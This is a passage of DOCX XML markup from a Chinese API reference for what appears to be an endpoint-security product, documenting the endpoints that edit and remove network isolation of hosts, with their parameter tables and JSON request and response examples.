            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C4D32D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A416EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A108479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F40B694" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436AB329" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F6804FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04941044" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D80D610" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30A9163F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C7377E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A8B6FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22A0E899" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="120805AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="_Toc115166286"/>
      <w:bookmarkStart w:id="428" w:name="修改隔离接口"/>
      <w:bookmarkEnd w:id="426"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>修改隔离接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w14:paraId="58CEC4B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D9EE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>edit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15A52E5A"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6"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3835"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="237EE5A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CEFFBE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D9F9227" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DB6B5B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3565F543" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FCD7A08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="563C269B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA1EF55" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B6786B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA7F777" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3FBE0ABE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CF4AAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237039B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23631925" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BC856FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>隔离方向,in:入站，out：出站，all：全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38425A6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78AEE4E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ipList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68904F80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0346DCC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="508FD099" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="453EEE87" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6493ADBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>portList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="107CF099" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2426D541" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00CFF6E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>放行端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E2CB75B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A519440" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B12D12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="161AF2DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E3F4A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3482E2FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B0850" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark":"123456",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>direction":"out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":["192.168.1.100","172.16.2.187"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":["80","81","82"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A96F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CE5A86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77738385"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5F90B45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589720A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E8B2B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1BE79A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2D154C77" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D64678B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FE520D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34293CFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33917117" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25233E8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5423B8CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7975B443" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="411265ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAC57D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07B2E72B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755B0D19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79DD1A06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="_Toc115166287"/>
      <w:bookmarkStart w:id="430" w:name="解除隔离接口"/>
      <w:bookmarkEnd w:id="428"/>
      <w:r>
        <w:t>解除隔离接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w14:paraId="323C4BB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E31AF47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/segmentation/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>del</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="631E2409"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630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="63FCE39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6596708" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ED257BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="667D4347" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8AF599" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="49CB126B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B51A1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79B78BB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11781340" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46872609" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机Id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E8E62F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777A49B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F27FFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
